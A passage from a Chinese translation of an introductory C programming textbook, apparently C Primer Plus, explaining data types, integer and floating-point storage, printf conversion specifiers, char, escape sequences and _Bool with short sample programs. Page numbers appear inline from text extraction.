worth $3867491.25. You are easily worth that! If platinum prices drop, eat more to maintain your value. 程序调整 即使用第2章介绍的方法,在程序中添加下面一行代码: getchar(); 程序的输出是否依旧在屏幕上一闪而过?本例,需要调用两次getchar() 函数: getchar(); getchar(); getchar()函数读取下一个输入字符,因此程序会等待用户输入。在这种 情况下,键入 156 并按下Enter(或Return)键(发送一个换行符),然后 scanf()读取键入的数字,第1个getchar()读取换行符,第2个getchar()让程序暂 停,等待输入。 3.1.1 程序中的新元素 程序清单3.1中包含C语言的一些新元素。 注意,代码中使用了一种新的变量声明。前面的例子中只使用了整数类 型的变量(int),但是本例使用了浮点数类型(float)的变量,以便处理更 大范围的数据。float 类型可以储存带小数的数字。 程序中演示了常量的几种新写法。现在可以使用带小数点的数了。 为了打印新类型的变量,在printf()中使用%f来处理浮点值。%.2f中的.2 用于精确控制输出,指定输出的浮点数只显示小数点后面两位。 112 scanf()函数用于读取键盘的输入。%f说明scanf()要读取用户从键盘输入 的浮点数,&weight告诉 scanf()把输入的值赋给名为 weight 的变量。scanf() 函数使用&符号表明找到 weight变量的地点。下一章将详细讨论&。就目前 而言,请按照这样写。 也许本程序最突出的新特点是它的交互性。计算机向用户询问信息,然 后用户输入数字。与非交互式程序相比,交互式程序用起来更有趣。更重要 的是,交互式使得程序更加灵活。例如,示例程序可以使用任何合理的体 重,而不只是 156磅。不必重写程序,就可以根据不同体重进行计算。 scanf()和printf()函数用于实现这种交互。scanf()函数读取用户从键盘输入的 数据,并把数据传递给程序;printf()函数读取程序中的数据,并把数据显示 在屏幕上。把两个函数结合起来,就可以建立人机双向通信(见图 3.1), 这让使用计算机更加饶有趣味。 图3.1 程序中的scanf()和printf()函数 本章着重解释上述新特性中的前两项:各种数据类型的变量和常量。第 4章将介绍后3项。 113 3.2 变量与常量数据 在程序的指导下,计算机可以做许多事情,如数值计算、名字排序、执 行语言或视频命令、计算彗星轨道、准备邮件列表、拨电话号码、画画、做 决策或其他你能想到的事情。要完成这些任务,程序需要使用数据,即承载 信息的数字和字符。有些数据类型在程序使用之前已经预先设定好了,在整 个程序的运行过程中没有变化,这些称为常量(constant)。其他数据类型 在程序运行期间可能会改变或被赋值,这些称为变量(variable)。在示例 程序中,weight 是一个变量,14.5833 是一个常量。那么,1700.0 是常量还 是变量?在现实生活中,白金的价格不会是常量,但是在程序中,像1700.0 这样的价格被视为常量。 114 3.3 数据:数据类型关键字 不仅变量和常量不同,不同的数据类型之间也有差异。一些数据类型表 示数字,一些数据类型表示字母(更普遍地说是字符)。C通过识别一些基 本的数据类型来区分和使用这些不同的数据类型。如果数据是常量,编译器 一般通过用户书写的形式来识别类型(如,42是整数,42.100是浮点数)。 但是,对变量而言,要在声明时指定其类型。稍后会详细介绍如何声明变 量。现在,我们先来了解一下 C语言的基本类型关键字。K&C给出了7个与 类型相关的关键字。C90标准添加了2个关键字,C99标准又添加了3个关键 字(见表3.1)。 表3.1 C语言的数据类型关键字 在C语言中,用int关键字来表示基本的整数类型。后3个关键字(long、 short和unsigned)和C90新增的signed用于提供基本整数类型的变式,例如 unsigned short int和long long int。char关键字用于指定字母和其他字符(如, #、$、%和*)。另外,char类型也可以表示较小的整数。float、double和 long double表示带小数点的数。_Bool类型表示布尔值(true或false), _complex和_Imaginary分别表示复数和虚数。 通过这些关键字创建的类型,按计算机的储存方式可分为两大基本类 型:整数类型和浮点数类型。 位、字节和字 位、字节和字是描述计算机数据单元或存储单元的术语。这里主要指存 115 储单元。 最小的存储单元是位(bit),可以储存0或1(或者说,位用于设 置“开”或“关”)。虽然1位储存的信息有限,但是计算机中位的数量十分庞 大。位是计算机内存的基本构建块。 字节(byte)是常用的计算机存储单位。对于几乎所有的机器,1字节 均为8位。这是字节的标准定义,至少在衡量存储单位时是这样(但是,C 语言对此有不同的定义,请参阅本章3.4.3节)。既然1位可以表示0或1,那 么8位字节就有256(2的8次方)种可能的0、1的组合。通过二进制编码(仅 用0和1便可表示数字),便可表示0~255的整数或一组字符(第15章将详细 讨论二进制编码,如果感兴趣可以现在浏览一下该章的内容)。 字(word)是设计计算机时给定的自然存储单位。对于8位的微型计算 机(如,最初的苹果机), 1个字长只有8位。从那以后,个人计算机字长 增至16位、32位,直到目前的64位。计算机的字长越大,其数据转移越快, 允许的内存访问也更多。 3.3.1 整数和浮点数 整数类型?浮点数类型?如果觉得这些术语非常陌生,别担心,下面先 简述它们的含义。如果不熟悉位、字节和字的概念,请阅读上面方框中的内 容。刚开始学习时,不必了解所有的细节,就像学习开车之前不必详细了解 汽车内部引擎的原理一样。但是,了解一些计算机或汽车引擎内部的原理会 对你有所帮助。 对我们而言,整数和浮点数的区别是它们的书写方式不同。对计算机而 言,它们的区别是储存方式不同。下面详细介绍整数和浮点数。 3.3.2 整数 和数学的概念一样,在C语言中,整数是没有小数部分的数。例如, 2、−23和2456都是整数。而3.14、0.22和2.000都不是整数。计算机以二进制 116 数字储存整数,例如,整数7以二进制写是111。因此,要在8位字节中储存 该数字,需要把前5位都设置成0,后3位设置成1(如图3.2所示)。 图3.2 使用二进制编码储存整数7 3.3.3 浮点数 浮点数与数学中实数的概念差不多。2.75、3.16E7、7.00 和 2e-8 都是浮 点数。注意,在一个值后面加上一个小数点,该值就成为一个浮点值。所 以,7是整数,7.00是浮点数。显然,书写浮点数有多种形式。稍后将详细 介绍e记数法,这里先做简要介绍:3.16E7 表示3.16×107(3.16 乘以10 的7次 方)。其中, 107=10000000,7被称为10的指数。 这里关键要理解浮点数和整数的储存方案不同。计算机把浮点数分成小 数部分和指数部分来表示,而且分开储存这两部分。因此,虽然7.00和7在 数值上相同,但是它们的储存方式不同。在十进制下,可以把7.0写成 0.7E1。这里,0.7是小数部分,1是指数部分。图3.3演示了一个储存浮点数 的例子。当然,计算机在内部使用二进制和2的幂进行储存,而不是10的 幂。第15章将详述相关内容。现在,我们着重讲解这两种类型的实际区别。 整数没有小数部分,浮点数有小数部分。 浮点数可以表示的范围比整数大。参见本章末的表3.3。 对于一些算术运算(如,两个很大的数相减),浮点数损失的精度更 117 多。 图3.3 以浮点格式(十进制)储存π的值 因为在任何区间内(如,1.0 到 2.0 之间)都存在无穷多个实数,所以 计算机的浮点数不能表示区间内所有的值。浮点数通常只是实际值的近似 值。例如,7.0可能被储存为浮点值6.99999。稍后会讨论更多精度方面的内 容。 过去,浮点运算比整数运算慢。不过,现在许多CPU都包含浮点处理 器,缩小了速度上的差距。 118 3.4 C语言基本数据类型 本节将详细节介绍C语言的基本数据类型,包括如何声明变量、如何表 示字面值常量(如,5或2.78),以及典型的用法。一些老式的C语言编译器 无法支持这里提到的所有类型,请查阅你使用的编译器文档,了解可以使用 哪些类型。 3.4.1 int类型 C语言提供了许多整数类型,为什么一种类型不够用?因为 C语言让程 序员针对不同情况选择不同的类型。特别是,C语言中的整数类型可表示不 同的取值范围和正负值。一般情况使用int类型即可,但是为满足特定任务和 机器的要求,还可以选择其他类型。 int类型是有符号整型,即int类型的值必须是整数,可以是正整数、负整 数或零。其取值范围依计算机系统而异。一般而言,储存一个int要占用一个 机器字长。因此,早期的16位IBM PC兼容机使用16位来储存一个int值,其 取值范围(即int值的取值范围)是-32768~32767。目前的个人计算机一般 是32位,因此用32位储存一个int值。现在,个人计算机产业正逐步向着64位 处理器发展,自然能储存更大的整数。ISO C规定int的取值范围最小 为-32768~32767。一般而言,系统用一个特殊位的值表示有符号整数的正 负号。第15章将介绍常用的方法。 1.声明int变量 第2章中已经用int声明过基本整型变量。先写上int,然后写变量名,最 后加上一个分号。要声明多个变量,可以单独声明每个变量,也可在int后面 列出多个变量名,变量名之间用逗号分隔。下面都是有效的声明: int erns; int hogs, cows, goats; 119 可以分别在4条声明中声明各变量,也可以在一条声明中声明4个变量。 两种方法的效果相同,都为4个int大小的变量赋予名称并分配内存空间。 以上声明创建了变量,但是并没有给它们提供值。变量如何获得值?前 面介绍过在程序中获取值的两种途径。第1种途径是赋值: cows = 112; 第2种途径是,通过函数(如,scanf())获得值。接下来,我们着重介 绍第3种途径。 2.初始化变量 初始化(initialize)变量就是为变量赋一个初始值。在C语言中,初始 化可以直接在声明中完成。只需在变量名后面加上赋值运算符(=)和待赋 给变量的值即可。如下所示: int hogs = 21; int cows = 32, goats = 14; int dogs, cats = 94; /* 有效,但是这种格式很糟糕 */ 以上示例的最后一行,只初始化了cats,并未初始化dogs。这种写法很 容易让人误认为dogs也被初始化为94,所以最好不要把初始化的变量和未初 始化的变量放在同一条声明中。 简而言之,声明为变量创建和标记存储空间,并为其指定初始值(如图 3.4所示)。 120 图3.4 定义并初始化变量 3.int类型常量 上面示例中出现的整数(21、32、14和94)都是整型常量或整型字面 量。C语言把不含小数点和指数的数作为整数。因此,22和-44都是整型常 量,但是22.0和2.2E1则不是。C语言把大多数整型常量视为int类型,但是非 常大的整数除外。详见后面“long常量和long long常量”小节对long int类型的 讨论。 4.打印int值 可以使用printf()函数打印int类型的值。第2章中介绍过,%d指明了在一 行中打印整数的位置。%d称为转换说明,它指定了printf()应使用什么格式 来显示一个值。格式化字符串中的每个%d都与待打印变量列表中相应的int 值匹配。这个值可以是int类型的变量、int类型的常量或其他任何值为int类型 的表达式。作为程序员,要确保转换说明的数量与待打印值的数量相同,编 译器不会捕获这类型的错误。程序清单3.2演示了一个简单的程序,程序中 初始化了一个变量,并打印该变量的值、一个常量值和一个简单表达式的 值。另外,程序还演示了如果粗心犯错会导致什么结果。 程序清单3.2 print1.c程序 121 /* print1.c - 演示printf()的一些特性 */ #include <stdio.h> int main(void) { int ten = 10; int two = 2; printf("Doing it right: "); printf("%d minus %d is %d\n", ten, 2, ten - two); printf("Doing it wrong: "); printf("%d minus %d is %d\n", ten); // 遗漏2个参数 return 0; } 编译并运行该程序,输出如下: Doing it right: 10 minus 2 is 8 Doing it wrong: 10 minus 16 is 1650287143 在第一行输出中,第1个%d对应int类型变量ten;第2个%d对应int类型常 量2;第3个%d对应int类型表达式ten - two的值。在第二行输出中,第1个%d 对应ten的值,但是由于没有给后两个%d提供任何值,所以打印出的值是内 存中的任意值(读者在运行该程序时显示的这两个数值会与输出示例中的数 值不同,因为内存中储存的数据不同,而且编译器管理内存的位置也不 同)。 122 你可能会抱怨编译器为何不能捕获这种明显的错误,但实际上问题出在 printf()不寻常的设计。大部分函数都需要指定数目的参数,编译器会检查参 数的数目是否正确。但是,printf()函数的参数数目不定,可以有1个、2个、 3个或更多,编译器也爱莫能助。记住,使用printf()函数时,要确保转换说 明的数量与待打印值的数量相等。 5.八进制和十六进制 通常,C语言都假定整型常量是十进制数。然而,许多程序员很喜欢使 用八进制和十六进制数。因为8和16都是2的幂,而10却不是。显然,八进制 和十六进制记数系统在表达与计算机相关的值时很方便。例如,十进制数 65536经常出现在16位机中,用十六进制表示正好是10000。另外,十六进制 数的每一位的数恰好由4位二进制数表示。例如,十六进制数3是0011,十六 进制数5是0101。因此,十六进制数35的位组合(bit pattern)是00110101, 十六进制数53的位组合是01010011。这种对应关系使得十六进制和二进制的 转换非常方便。但是,计算机如何知道10000是十进制、十六进制还是二进 制?在C语言中,用特定的前缀表示使用哪种进制。0x或0X前缀表示十六进 制值,所以十进制数16表示成十六进制是0x10或0X10。与此类似,0前缀表 示八进制。例如,十进制数16表示成八进制是020。第15章将更全面地介绍 进制相关的内容。 要清楚,使用不同的进制数是为了方便,不会影响数被储存的方式。也 就是说,无论把数字写成16、020或0x10,储存该数的方式都相同,因为计 算机内部都以二进制进行编码。 6.显示八进制和十六进制 在C程序中,既可以使用和显示不同进制的数。不同的进制要使用不同 的转换说明。以十进制显示数字,使用%d;以八进制显示数字,使用%o; 以十六进制显示数字,使用%x。另外,要显示各进制数的前缀0、0x和0X, 必须分别使用%#o、%#x、%#X。程序清单3.3演示了一个小程序。回忆一 下,在某些集成开发环境(IDE)下编写的代码中插入getchar();语句,程序 123 在执行完毕后不会立即关闭执行窗口。 程序清单3.3 bases.c程序 /* bases.c--以十进制、八进制、十六进制打印十进制数100 */ #include <stdio.h> int main(void) { int x = 100; printf("dec = %d; octal = %o; hex = %x\n", x, x, x); printf("dec = %d; octal = %#o; hex = %#x\n", x, x, x); return 0; } 编译并运行该程序,输出如下: dec = 100; octal = 144; hex = 64 dec = 100; octal = 0144; hex = 0x64 该程序以3种不同记数系统显示同一个值。printf()函数做了相应的转 换。注意,如果要在八进制和十六进制值前显示0和0x前缀,要分别在转换 说明中加入#。 3.4.2 其他整数类型 初学C语言时,int类型应该能满足大多数程序的整数类型需求。尽管如 此,还应了解一下整型的其他形式。当然,也可以略过本节跳至3.4.3节阅读 124 char类型的相关内容,以后有需要时再阅读本节。 C语言提供3个附属关键字修饰基本整数类型:short、long和unsigned。 应记住以下几点。 short int类型(或者简写为short)占用的存储空间可能比int类型少,常 用于较小数值的场合以节省空间。与int类似,short是有符号类型。 long int或long占用的存储空间可能比int多,适用于较大数值的场合。与 int类似,long是有符号类型。 long long int或long long(C99标准加入)占用的储存空间可能比long多, 适用于更大数值的场合。该类型至少占64位。与int类似,long long是有符号 类型。 unsigned int或unsigned只用于非负值的场合。这种类型与有符号类型表 示的范围不同。例如,16位unsigned int允许的取值范围是0~65535,而不 是-32768~32767。用于表示正负号的位现在用于表示另一个二进制位,所 以无符号整型可以表示更大的数。 在C90标准中,添加了unsigned long int或unsigned long和unsigned int或 unsigned short类型。C99标准又添加了unsigned long long int或unsigned long long。 在任何有符号类型前面添加关键字signed,可强调使用有符号类型的意 图。例如,short、short int、signed short、signed short int都表示同一种类型。 1.声明其他整数类型 其他整数类型的声明方式与int类型相同,下面列出了一些例子。不是所 有的C编译器都能识别最后3条声明,最后一个例子所有的类型是C99标准新 增的。 long int estine; 125 long johns; short int erns; short ribs; unsigned int s_count; unsigned players; unsigned long headcount; unsigned short yesvotes; long long ago; 2.使用多种整数类型的原因 为什么说short类型“可能”比int类型占用的空间少,long类型“可能”比int 类型占用的空间多?因为C语言只规定了short占用的存储空间不能多于int, long占用的存储空间不能少于int。这样规定是为了适应不同的机器。例如, 过去的一台运行Windows 3的机器上,int类型和short类型都占16位,long类 型占32位。后来,Windows和苹果系统都使用16位储存short类型,32位储存 int类型和long类型(使用32位可以表示的整数数值超过20亿)。现在,计算 机普遍使用64位处理器,为了储存64位的整数,才引入了long long类型。 现在,个人计算机上最常见的设置是,long long占64位,long占32位, short占16位,int占16位或32位(依计算机的自然字长而定)。原则上,这4 种类型代表4种不同的大小,但是在实际使用中,有些类型之间通常有重 叠。 C 标准对基本数据类型只规定了允许的最小大小。对于 16 位机,short 和 int 的最小取值范围是[−32767,32767];对于32位机,long的最小取值范围 是[−2147483647,2147483647]。对于unsigned short和unsigned int,最小取值范 围是[0,65535];对于unsigned long,最小取值范围是[0,4294967295]。long 126 long类型是为了支持64位的需求,最小取值范围是 [−9223372036854775807,9223372036854775807];unsigned long long的最小取 值范围是[0,18446744073709551615]。如果要开支票,这个数是一千八百亿 亿(兆)六千七百四十四万亿零七百三十七亿零九百五十五万一千六百一十 五。但是,谁会去数? int类型那么多,应该如何选择?首先,考虑unsigned类型。这种类型的 数常用于计数,因为计数不用负数。而且,unsigned类型可以表示更大的正 数。 如果一个数超出了int类型的取值范围,且在long类型的取值范围内时, 使用long类型。然而,对于那些long占用的空间比int大的系统,使用long类 型会减慢运算速度。因此,如非必要,请不要使用long类型。另外要注意一 点:如果在long类型和int类型占用空间相同的机器上编写代码,当确实需要 32位的整数时,应使用long类型而不是int类型,以便把程序移植到16位机后 仍然可以正常工作。类似地,如果确实需要64位的整数,应使用long long类 型。 如果在int设置为32位的系统中要使用16位的值,应使用short类型以节省 存储空间。通常,只有当程序使用相对于系统可用内存较大的整型数组时, 才需要重点考虑节省空间的问题。使用short类型的另一个原因是,计算机中 某些组件使用的硬件寄存器是16位。 3.long常量和long long常量 通常,程序代码中使用的数字(如,2345)都被储存为int类型。如果使 用1000000这样的大数字,超出了int类型能表示的范围,编译器会将其视为 long int类型(假设这种类型可以表示该数字)。如果数字超出long可表示的 最大值,编译器则将其视为unsigned long类型。如果还不够大,编译器则将 其视为long long或unsigned long long类型(前提是编译器能识别这些类型)。 八进制和十六进制常量被视为int类型。如果值太大,编译器会尝试使用 unsigned int。如果还不够大,编译器会依次使用long、unsigned long、long 127 long和unsigned long long类型。 有些情况下,需要编译器以long类型储存一个小数字。例如,编程时要 显式使用IBM PC上的内存地址时。另外,一些C标准函数也要求使用long类 型的值。要把一个较小的常量作为long类型对待,可以在值的末尾加上l(小 写的L)或L后缀。使用L后缀更好,因为l看上去和数字1很像。因此,在int 为16位、long为32位的系统中,会把7作为16位储存,把7L作为32位储存。l 或L后缀也可用于八进制和十六进制整数,如020L和0x10L。 类似地,在支持long long类型的系统中,也可以使用ll或LL后缀来表示 long long类型的值,如3LL。另外,u或U后缀表示unsigned long long,如 5ull、10LLU、6LLU或9Ull。 整数溢出 如果整数超出了相应类型的取值范围会怎样?下面分别将有符号类型和 无符号类型的整数设置为比最大值略大,看看会发生什么(printf()函数使 用%u说明显示unsigned int类型的值)。 /* toobig.c-- 超出系统允许的最大int值*/ #include <stdio.h> int main(void) { int i = 2147483647; unsigned int j = 4294967295; printf("%d %d %d\n", i, i+1, i+2); printf("%u %u %u\n", j, j+1, j+2); 128 return 0; } 在我们的系统下输出的结果是: 2147483647   -2147483648  -2147483647 4294967295   0   1 可以把无符号整数j看作是汽车的里程表。当达到它能表示的最大值 时,会重新从起始点开始。整数 i 也是类似的情况。它们主要的区别是,在 超过最大值时,unsigned int 类型的变量 j 从 0开始;而int类型的变量i则从 −2147483648开始。注意,当i超出(溢出)其相应类型所能表示的最大值 时,系统并未通知用户。因此,在编程时必须自己注意这类问题。 溢出行为是未定义的行为,C 标准并未定义有符号类型的溢出规则。以 上描述的溢出行为比较有代表性,但是也可能会出现其他情况。 4.打印short、long、long long和unsigned类型 打印unsigned int类型的值,使用%u转换说明;打印long类型的值,使 用%ld转换说明。如果系统中int和long的大小相同,使用%d就行。但是,这 样的程序被移植到其他系统(int和long类型的大小不同)中会无法正常工 作。在x和o前面可以使用l前缀,%lx表示以十六进制格式打印long类型整 数,%lo表示以八进制格式打印long类型整数。注意,虽然C允许使用大写或 小写的常量后缀,但是在转换说明中只能用小写。 C语言有多种printf()格式。对于short类型,可以使用h前缀。%hd表示以 十进制显示short类型的整数,%ho表示以八进制显示short类型的整数。h和l 前缀都可以和u一起使用,用于表示无符号类型。例如,%lu表示打印 unsigned long类型的值。程序清单3.4演示了一些例子。对于支持long long类 型的系统,%lld和%llu分别表示有符号和无符号类型。第4章将详细介绍转 换说明。 129 程序清单3.4 print2.c程序 /* print2.c--更多printf()的特性 */ #include <stdio.h> int main(void) { unsigned int un = 3000000000; /* int为32位和short为16位的系统 */ short end = 200; long big = 65537; long long verybig = 12345678908642; printf("un = %u and not %d\n", un, un); printf("end = %hd and %d\n", end, end); printf("big = %ld and not %hd\n", big, big); printf("verybig= %lld and not %ld\n", verybig, verybig); return 0; } 在特定的系统中输出如下(输出的结果可能不同): un = 3000000000 and not -1294967296 end = 200 and 200 big = 65537 and not 1 130 verybig= 12345678908642 and not 1942899938 该例表明,使用错误的转换说明会得到意想不到的结果。第 1 行输出, 对于无符号变量 un,使用%d会生成负值!其原因是,无符号值 3000000000 和有符号值−129496296 在系统内存中的内部表示完全相同(详见第15 章)。因此,如果告诉printf()该数是无符号数,它打印一个值;如果告诉它 该数是有符号数,它将打印另一个值。在待打印的值大于有符号值的最大值 时,会发生这种情况。对于较小的正数(如96),有符号和无符号类型的存 储、显示都相同。 第2行输出,对于short类型的变量end,在printf()中无论指定以short类型 (%hd)还是int类型(%d)打印,打印出来的值都相同。这是因为在给函 数传递参数时,C编译器把short类型的值自动转换成int类型的值。你可能会 提出疑问:为什么要进行转换?h修饰符有什么用?第1个问题的答案是, int类型被认为是计算机处理整数类型时最高效的类型。因此,在short和int类 型的大小不同的计算机中,用int类型的参数传递速度更快。第2个问题的答 案是,使用h修饰符可以显示较大整数被截断成 short 类型值的情况。第 3 行 输出就演示了这种情况。把 65537 以二进制格式写成一个 32 位数是 00000000000000010000000000000001。使用%hd,printf()只会查看后 16 位,所以显示的值是 1。与此类似,输出的最后一行先显示了verybig的完整 值,然后由于使用了%ld,printf()只显示了储存在后32位的值。 本章前面介绍过,程序员必须确保转换说明的数量和待打印值的数量相 同。以上内容也提醒读者,程序员还必须根据待打印值的类型使用正确的转 换说明。 提示 匹配printf()说明符的类型 在使用 printf()函数时,切记检查每个待打印值都有对应的转换说明, 还要检查转换说明的类型是否与待打印值的类型相匹配。 3.4.3 使用字符:char类型 131 char类型用于储存字符(如,字母或标点符号),但是从技术层面看, char是整数类型。因为char类型实际上储存的是整数而不是字符。计算机使 用数字编码来处理字符,即用特定的整数表示特定的字符。美国最常用的编 码是ASCII编码,本书也使用此编码。例如,在ASCII码中,整数65代表大写 字母A。因此,储存字母A实际上储存的是整数65(许多IBM的大型主机使 用另一种编码——EBCDIC,其原理相同。另外,其他国家的计算机系统可 能使用完全不同的编码)。 标准ASCII码的范围是0~127,只需7位二进制数即可表示。通常,char 类型被定义为8位的存储单元,因此容纳标准ASCII码绰绰有余。许多其他系 统(如IMB PC和苹果Macs)还提供扩展ASCII码,也在8位的表示范围之 内。一般而言,C语言会保证char类型足够大,以储存系统(实现C语言的系 统)的基本字符集。 许多字符集都超过了127,甚至多于255。例如,日本汉字(kanji)字符 集。商用的统一码(Unicode)创建了一个能表示世界范围内多种字符集的 系统,目前包含的字符已超过110000个。国际标准化组织(ISO)和国际电 工技术委员会(IEC)为字符集开发了ISO/IEC 10646标准。统一码标准也与 ISO/IEC 10646标准兼容。 C语言把1字节定义为char类型占用的位(bit)数,因此无论是16位还是 32位系统,都可以使用char类型。 1.声明char类型变量 char类型变量的声明方式与其他类型变量的声明方式相同。下面是一些 例子: char response; char itable, latan; 以上声明创建了3个char类型的变量:response、itable和latan。 132 2.字符常量和初始化 如果要把一个字符常量初始化为字母 A,不必背下 ASCII 码,用计算机 语言很容易做到。通过以下初始化把字母A赋给grade即可: char grade = 'A'; 在C语言中,用单引号括起来的单个字符被称为字符常量(character constant)。编译器一发现'A',就会将其转换成相应的代码值。单引号必不 可少。下面还有一些其他的例子: char broiled;   /* 声明一个char类型的变量 */ broiled = 'T';  /* 为其赋值,正确 */ broiled = T;   /* 错误!此时T是一个变量 */ broiled = "T";  /* 错误!此时"T"是一个字符串 */ 如上所示,如果省略单引号,编译器认为T是一个变量名;如果把T用 双引号括起来,编译器则认为"T"是一个字符串。字符串的内容将在第4章中 介绍。 实际上,字符是以数值形式储存的,所以也可使用数字代码值来赋值: char grade = 65; /* 对于ASCII,这样做没问题,但这是一种不好的编程 风格 */ 在本例中,虽然65是int类型,但是它在char类型能表示的范围内,所以 将其赋值给grade没问题。由于65是字母A对应的ASCII码,因此本例是把A 赋给grade。注意,能这样做的前提是系统使用ASCII码。其实,用'A'代替65 才是较为妥当的做法,这样在任何系统中都不会出问题。因此,最好使用字 符常量,而不是数字代码值。 奇怪的是,C语言将字符常量视为int类型而非char类型。例如,在int为 133 32位、char为8位的ASCII系统中,有下面的代码: char grade = 'B'; 本来'B'对应的数值66储存在32位的存储单元中,现在却可以储存在8位 的存储单元中(grade)。利用字符常量的这种特性,可以定义一个字符常 量'FATE',即把4个独立的8位ASCII码储存在一个32位存储单元中。如果把 这样的字符常量赋给char类型变量grade,只有最后8位有效。因此,grade的 值是'E'。 3.非打印字符 单引号只适用于字符、数字和标点符号,浏览ASCII表会发现,有些 ASCII字符打印不出来。例如,一些代表行为的字符(如,退格、换行、终 端响铃或蜂鸣)。C语言提供了3种方法表示这些字符。 第1种方法前面介绍过——使用ASCII码。例如,蜂鸣字符的ASCII值是 7,因此可以这样写: char beep = 7; 第 2 种方法是,使用特殊的符号序列表示一些特殊的字符。这些符号序 列叫作转义序列(escape sequence)。表3.2列出了转义序列及其含义。 把转义序列赋给字符变量时,必须用单引号把转义序列括起来。例如, 假设有下面一行代码: char nerf = '\n'; 稍后打印变量nerf的效果是,在打印机或屏幕上另起一行。 表3.2 转义序列 134 现在,我们来仔细分析一下转义序列。使用C90新增的警报字符(\a) 是否能产生听到或看到的警报,取决于计算机的硬件,蜂鸣是最常见的警报 (在一些系统中,警报字符不起作用)。C标准规定警报字符不得改变活跃 位置。标准中的活跃位置(active position)指的是显示设备(屏幕、电传打 字机、打印机等)中下一个字符将出现的位置。简而言之,平时常说的屏幕 光标位置就是活跃位置。在程序中把警报字符输出在屏幕上的效果是,发出 一声蜂鸣,但不会移动屏幕光标。 接下来的转义字符\b、\f、\n、\r、\t和\v是常用的输出设备控制字符。了 解它们最好的方式是查看它们对活跃位置的影响。换页符(\f)把活跃位置 移至下一页的开始处;换行符(\n)把活跃位置移至下一行的开始处;回车 符(\r)把活跃位置移动到当前行的开始处;水平制表符(\t)将活跃位置 移至下一个水平制表点(通常是第1个、第9个、第17个、第25个等字符位 置);垂直制表符(\v)把活跃位置移至下一个垂直制表点。 这些转义序列字符不一定在所有的显示设备上都起作用。例如,换页符 和垂直制表符在PC屏幕上会生成奇怪的符号,光标并不会移动。只有将其 输出到打印机上时才会产生前面描述的效果。 接下来的3个转义序列(\\、\'、\")用于打印\、'、"字符(由于这些字符 135 用于定义字符常量,是printf()函数的一部分,若直接使用它们会造成混 乱)。如果打印下面一行内容: Gramps sez, "a \ is a backslash." 应这样编写代码: printf("Gramps sez, \"a \\ is a backslash.\"\n"); 表3.2中的最后两个转义序列(\0oo和\xhh)是ASCII码的特殊表示。如 果要用八进制ASCII码表示一个字符,可以在编码值前面加一个反斜杠(\) 并用单引号括起来。例如,如果编译器不识别警报字符(\a),可以使用 ASCII码来代替: beep = '\007'; 可以省略前面的 0,'\07'甚至'\7'都可以。即使没有前缀 0,编译器在处 理这种写法时,仍会解释为八进制。 从C90开始,不仅可以用十进制、八进制形式表示字符常量,C语言还 提供了第3种选择——用十六进制形式表示字符常量,即反斜杠后面跟一个x 或X,再加上1~3位十六进制数字。例如,Ctrl+P字符的ASCII十六进制码是 10(相当于十进制的16),可表示为'\x10'或'\x010'。图3.5列出了一些整数类 型的不同进制形式。 136 图3.5 int系列类型的常量写法示例 使用ASCII码时,注意数字和数字字符的区别。例如,字符4对应的 ASCII码是52。'4'表示字符4,而不是数值4。 关于转义序列,读者可能有下面3个问题。 上面最后一个例子(printf("Gramps sez, \"a \\ is a backslash\"\"n"),为何 没有用单引号把转义序列括起来?无论是普通字符还是转义序列,只要是双 引号括起来的字符集合,就无需用单引号括起来。双引号中的字符集合叫作 字符串(详见第4章)。注意,该例中的其他字符(G、r、a、m、p、s等) 都没有用单引号括起来。与此类似,printf("Hello!\007\n");将打印Hello!并发 出一声蜂鸣,而 printf("Hello!7\n");则打印 Hello!7。不是转义序列中的数字 将作为普通字符被打印出来。 何时使用ASCII码?何时使用转义序列?如果要在转义序列(假设使 用'\f')和ASCII码('\014')之间选择,请选择前者(即'\f')。这样的写法不 仅更好记,而且可移植性更高。'\f'在不使用ASCII码的系统中,仍然有效。 137 如果要使用ASCII码,为何要写成'\032'而不是032?首先,'\032'能更清 晰地表达程序员使用字符编码的意图。其次,类似\032这样的转义序列可以 嵌入C的字符串中,如printf("Hello!\007\n");中就嵌入了\007。 4.打印字符 printf()函数用%c指明待打印的字符。前面介绍过,一个字符变量实际 上被储存为1字节的整数值。因此,如果用%d转换说明打印 char类型变量的 值,打印的是一个整数。而%c转换说明告诉printf()打印该整数值对应的字 符。程序清单3.5演示了打印char类型变量的两种方式。 程序清单3.5 charcode.c程序 /* charcode.c-显示字符的代码编号 */ #include <stdio.h> int main(void) { char ch; printf("Please enter a character.\n"); scanf("%c", &ch); /* 用户输入字符 */ printf("The code for %c is %d.\n", ch, ch); return 0; } 运行该程序后,输出示例如下: Please enter a character. 138 C The code for C is 67. 运行该程序时,在输入字母后不要忘记按下Enter或Return键。随后, scanf()函数会读取用户输入的字符,&符号表示把输入的字符赋给变量ch。 接着,printf()函数打印ch的值两次,第1次打印一个字符(对应代码中 的%c),第2次打印一个十进制整数值(对应代码中的%d)。注意,printf() 函数中的转换说明决定了数据的显示方式,而不是数据的储存方式(见图 3.6)。 图3.6 数据显示和数据存储 5.有符号还是无符号 有些C编译器把char实现为有符号类型,这意味着char可表示的范围 是-128~127。而有些C编译器把char实现为无符号类型,那么char可表示的 范围是0~255。请查阅相应的编译器手册,确定正在使用的编译器如何实现 char类型。或者,可以查阅limits.h头文件。下一章将详细介绍头文件的内 容。 根据C90标准,C语言允许在关键字char前面使用signed或unsigned。这 139 样,无论编译器默认char是什么类型,signed char表示有符号类型,而 unsigned char表示无符号类型。这在用char类型处理小整数时很有用。如果 只用char处理字符,那么char前面无需使用任何修饰符。 3.4.4 _Bool类型 C99标准添加了_Bool类型,用于表示布尔值,即逻辑值true和false。因 为C语言用值1表示true,值0表示false,所以_Bool类型实际上也是一种整数 类型。但原则上它仅占用1位存储空间,因为对0和1而言,1位的存储空间足 够了。 程序通过布尔值可选择执行哪部分代码。我们将在第6章和第7章中详述 相关内容。 3.4.5 可移植类型:stdint.h和inttypes.h C 语言提供了许多有用的整数类型。但是,某些类型名在不同系统中的 功能不一样。C99 新增了两个头文件stdint.h和inttypes.h,以确保C语言的类 型在各系统中的功能相同。 C语言为现有类型创建了更多类型名。这些新的类型名定义在stdint.h头 文件中。例如,int32_t表示32位的有符号整数类型。在使用32位int的系统 中,头文件会把int32_t作为int的别名。不同的系统也可以定义相同的类型 名。例如,int为16位、long为32位的系统会把int32_t作为long的别名。然 后,使用int32_t类型编写程序,并包含stdint.h头文件时,编译器会把int或 long替换成与当前系统匹配的类型。 上面讨论的类型别名是精确宽度整数类型(exact-width integer type)的 示例。int32_t表示整数类型的宽度正好是32位。但是,计算机的底层系统可 